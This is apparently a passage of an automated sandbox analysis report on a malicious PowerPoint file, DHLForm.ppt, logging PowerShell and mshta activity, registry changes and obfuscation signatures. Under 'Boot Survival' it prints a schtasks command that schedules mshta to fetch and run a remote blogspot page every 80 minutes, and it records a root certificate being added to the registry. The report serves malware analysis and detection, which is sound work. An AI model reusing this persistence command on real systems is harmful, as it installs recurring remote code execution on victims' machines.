Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: mshta.exe, 00000005.00000002.638454939.0000000004020000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: DHLForm.ppt Initial sample: OLE summary keywords = hammers
Source: DHLForm.ppt Initial sample: OLE document summary bytes = 0
Source: DHLForm.ppt Initial sample: OLE document summary mmclips = 0
Source: DHLForm.ppt Initial sample: OLE summary subject = hammers
Source: DHLForm.ppt Initial sample: OLE document summary hiddenslides = 0
Source: DHLForm.ppt Initial sample: OLE document summary slides = 0
Source: DHLForm.ppt Initial sample: OLE document summary presentationtarget = Widescreen
Source: DHLForm.ppt Initial sample: OLE document summary notes = 0

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 5_2_00010CA6 pushad ; ret 5_2_00010CBD
Source: C:\Windows\System32\mshta.exe Code function: 29_2_070B62B0 push ecx; ret 29_2_070B6307
Source: C:\Windows\System32\mshta.exe Code function: 32_2_06CA62CD push ecx; ret 32_2_06CA6324
Source: C:\Windows\System32\mshta.exe Code function: 34_2_07B262D2 push ecx; ret 34_2_07B26329

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''

Hooking and other Techniques for Hiding and Protection:

barindex
Stores large binary data to the registry
Source: C:\Windows\System32\mshta.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
